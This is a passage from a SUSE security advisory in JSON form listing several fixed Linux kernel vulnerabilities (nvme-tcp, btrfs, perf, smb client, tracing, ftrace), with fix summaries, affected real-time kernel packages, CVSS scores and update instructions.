This\nsecond call does not call nvme_remove_admin_tag_set() on failure, due to\nthe new=false argument. Then the admin tag set is not removed. However,\nnvme_tcp_create_ctrl() assumes that nvme_tcp_setup_ctrl() would call\nnvme_remove_admin_tag_set(). Then it frees up struct nvme_tcp_ctrl which\nhas admin_tag_set field. Later on, the timeout handler accesses the\nadmin_tag_set field and causes the BUG KASAN slab-use-after-free.\n\nTo not leave the admin tag set, call nvme_remove_admin_tag_set() when\nthe second nvme_tcp_configure_admin_queue() call fails. Do not return\nfrom nvme_tcp_setup_ctrl() on failure. Instead, jump to \"destroy_admin\"\ngo-to label to call nvme_tcp_teardown_admin_queue() which calls\nnvme_remove_admin_tag_set().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38209",
"url": "https://www.suse.com/security/cve/CVE-2025-38209"
},
{
"category": "external",
"summary": "SUSE Bug 1246022 for CVE-2025-38209",
"url": "https://bugzilla.suse.com/1246022"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-38209"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-38243"
},
{
"cve": "CVE-2025-38322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/intel: Fix crash in icl_update_topdown_event()\n\nThe perf_fuzzer found a hard-lockup crash on a RaptorLake machine:\n\n Oops: general protection fault, maybe for address 0xffff89aeceab400: 0000\n CPU: 23 UID: 0 PID: 0 Comm: swapper/23\n Tainted: [W]=WARN\n Hardware name: Dell Inc. Precision 9660/0VJ762\n RIP: 0010:native_read_pmc+0x7/0x40\n Code: cc e8 8d a9 01 00 48 89 03 5b cd cc cc cc cc 0f 1f ...\n RSP: 000:fffb03100273de8 EFLAGS: 00010046\n ....\n Call Trace:\n \u003cTASK\u003e\n icl_update_topdown_event+0x165/0x190\n ? ktime_get+0x38/0xd0\n intel_pmu_read_event+0xf9/0x210\n __perf_event_read+0xf9/0x210\n\nCPUs 16-23 are E-core CPUs that don\u0027t support the perf metrics feature.\nThe icl_update_topdown_event() should not be invoked on these CPUs.\n\nIt\u0027s a regression of commit:\n\n f9bdf1f95339 (\"perf/x86/intel: Avoid disable PMU if !cpuc-\u003eenabled in sample read\")\n\nThe bug introduced by that commit is that the is_topdown_event() function\nis mistakenly used to replace the is_topdown_count() call to check if the\ntopdown functions for the perf metrics feature should be invoked.\n\nFix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38322",
"url": "https://www.suse.com/security/cve/CVE-2025-38322"
},
{
"category": "external",
"summary": "SUSE Bug 1246447 for CVE-2025-38322",
"url": "https://bugzilla.suse.com/1246447"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-38322"
},
{
"cve": "CVE-2025-38379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix warning when reconnecting channel\n\nWhen reconnecting a channel in smb2_reconnect_server(), a dummy tcon\nis passed down to smb2_reconnect() with -\u003equery_interface\nuninitialized, so we can\u0027t call queue_delayed_work() on it.\n\nFix the following warning by ensuring that we\u0027re queueing the delayed\nworker from correct tcon.\n\nWARNING: CPU: 4 PID: 1126 at kernel/workqueue.c:2498 __queue_delayed_work+0x1d2/0x200\nModules linked in: cifs cifs_arc4 nls_ucs2_utils cifs_md4 [last unloaded: cifs]\nCPU: 4 UID: 0 PID: 1126 Comm: kworker/4:0 Not tainted 6.16.0-rc3 #5 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-4.fc42 04/01/2014\nWorkqueue: cifsiod smb2_reconnect_server [cifs]\nRIP: 0010:__queue_delayed_work+0x1d2/0x200\nCode: 41 5e 41 5f e9 7f ee ff ff 90 0f 0b 90 e9 5d ff ff ff bf 02 00\n00 00 e8 6c f3 07 00 89 c3 eb bd 90 0f 0b 90 e9 57 f\u003e 0b 90 e9 65 fe\nff ff 90 0f 0b 90 e9 72 fe ff ff 90 0f 0b 90 e9\nRSP: 0018:ffffc900014afad8 EFLAGS: 00010003\nRAX: 0000000000000000 RBX: ffff888124d99988 RCX: ffffffff81399cc1\nRDX: dffffc0000000000 RSI: ffff888114326e00 RDI: ffff888124d999f0\nRBP: 000000000000ea60 R08: 0000000000000001 R09: ffffed10249b3331\nR10: ffff888124d9998f R11: 0000000000000004 R12: 0000000000000040\nR13: ffff888114326e00 R14: ffff888124d999d8 R15: ffff888114939020\nFS: 0000000000000000(0000) GS:ffff88829f7fe000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007ffe7a2b4038 CR3: 0000000120a6f000 CR4: 0000000000750ef0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n queue_delayed_work_on+0xb4/0xc0\n smb2_reconnect+0xb22/0xf50 [cifs]\n smb2_reconnect_server+0x413/0xd40 [cifs]\n ? __pfx_smb2_reconnect_server+0x10/0x10 [cifs]\n ? local_clock_noinstr+0xd/0xd0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n process_one_work+0x4c5/0xa10\n ? __pfx_process_one_work+0x10/0x10\n ? __list_add_valid_or_report+0x37/0x120\n worker_thread+0x2f1/0x5a0\n ? __kthread_parkme+0xde/0x100\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x1fe/0x380\n ? kthread+0x10f/0x380\n ? __pfx_kthread+0x10/0x10\n ? local_clock_noinstr+0xd/0xd0\n ? ret_from_fork+0x1b/0x1f0\n ? local_clock+0x15/0x30\n ? lock_release+0x29b/0x390\n ? rcu_is_watching+0x20/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x15b/0x1f0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\nirq event stamp: 1116206\nhardirqs last enabled at (1116205): [\u003cffffffff8143af42\u003e] __up_console_sem+0x52/0x60\nhardirqs last disabled at (1116206): [\u003cffffffff81399f0e\u003e] queue_delayed_work_on+0x6e/0xc0\nsoftirqs last enabled at (1116138): [\u003cffffffffc04562fd\u003e] __smb_send_rqst+0x42d/0x950 [cifs]\nsoftirqs last disabled at (1116136): [\u003cffffffff823d35e1\u003e] release_sock+0x21/0xf0",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38379",
"url": "https://www.suse.com/security/cve/CVE-2025-38379"
},
{
"category": "external",
"summary": "SUSE Bug 1247030 for CVE-2025-38379",
"url": "https://bugzilla.suse.com/1247030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-38379"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
